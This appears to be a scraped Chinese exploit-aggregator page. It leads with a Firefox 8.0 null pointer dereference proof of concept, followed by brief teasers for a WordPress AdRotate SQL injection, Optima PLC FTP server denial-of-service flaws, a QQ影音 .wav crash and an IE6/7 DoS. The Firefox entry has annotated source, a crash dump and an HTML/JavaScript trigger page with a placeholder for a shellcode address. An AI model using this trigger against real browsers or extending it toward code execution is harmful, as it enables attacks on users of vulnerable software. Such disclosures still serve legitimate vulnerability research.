Firefox 8.0 Null Pointer Dereference PoC

# Firefox <= 8.0 null pointer dereference PoC exploit
# Author: 0in (Maksymilian Motyl)
# Tested on Firefox 8.0/4.0 on windows and Firefox 7.1 on Linux
# Lets see in code:
# $ cat ./mozilla-release/content/base/src/nsObjectLoadingContent.cpp

NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
                                       nsISupports *aContext)
{
  if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there
    return NS_BINDING_ABORTED;
  }
  AutoNotifier notifier(this, PR_TRUE);

  if (!IsSuccessfulRequest(aRequest)) { // go

//----------------------------------------------------------------------------------
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)
{
  nsresult status;
  nsresult rv = aRequest->GetStatus(&status); // Code execution is here.

// ---------------------------------------------------------------------------------

DUMP:
  014E7A28   8B7D 08          MOV EDI,DWORD PTR SS:[EBP+8]
  014E7A2B   8B07             MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
  014E7A2D   8D4D FC          LEA ECX,DWORD PTR SS:[EBP-4]
  014E7A30   51               PUSH ECX
  014E7A31   57               PUSH EDI
  014E7A32   FF50 14          CALL DWORD PTR DS:[EAX+14]

  EAX 0012BFC0
  ECX 00080000
  EDX 00080000
  EBX 03A199E8
  ESP 0012BF44
  EBP 0012BF54
  ESI 03A199C0
  EDI 00000000
  EIP 014E7A2B xul.014E7A2B

$ cat 2011_powrot_komuny.html
<html>
<body>

<object id="dupa">
<script>
RIINDC=document.getElementById("dupa");
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);
//RIINDC.mchannel=SHELLCODE_ADDR
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));

</script>
</body>
</html>

WordPress AdRotate plugin <= 3.6.6 SQL Injection

# Exploit Title: WordPress AdRotate plugin # Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded 阅读全文

Optima PLC APIFTP Server两个拒绝服务漏洞

受影响系统:
VanDyke AbsoluteFTP 2.x
描述:
Optima是一套通过SCADA/HMI界面控制PLC的自动软件。APIFTP Server是共享文件夹中的远程文件的文件服务器。
Optima PLC中存在两个安全漏洞,可被恶意用户利用造成拒绝服务。
1)处理 APIFTP Server (APIFTPServer.exe) 中的某些报文时的错误可被利用重复触发空指针引用,通过发送到端口10260/TCP的特制报文导致栈溢出;
2)处理 APIFTP Server (APIFTPServer.exe) 中的某些报文时的错误可被利用通过发送到端口10260/TCP的特制报文造成无限循环。
< *来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://aluigi.altervista.org/adv/optimalog_1-adv.txt
*>
测试方法: 阅读全文

QQ影音.wav文件解析拒绝服务漏洞

受影响系统:
Tencent QQ影音 2.3.696.400p1
描述:
QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。

用户受骗使用QQ影音打开了畸形的.wav文件就会导致播放器崩溃。
< *来源:hadji samir (s-dz@hotmail.fr)
*>
测试方法: 阅读全文

IE6 / 7 Remote Dos vulnerability

# Exploit Title: IE6 / 7 Remote Dos vulnerability

# Date: 27/07/2010

# Author: Richard leahy

# Version: 6 / 7

# Tested on: Windows Xp Sp3 阅读全文

回到顶部

Hi~boy

We must repeat a thousand and one times thatperseverance is the only road to success.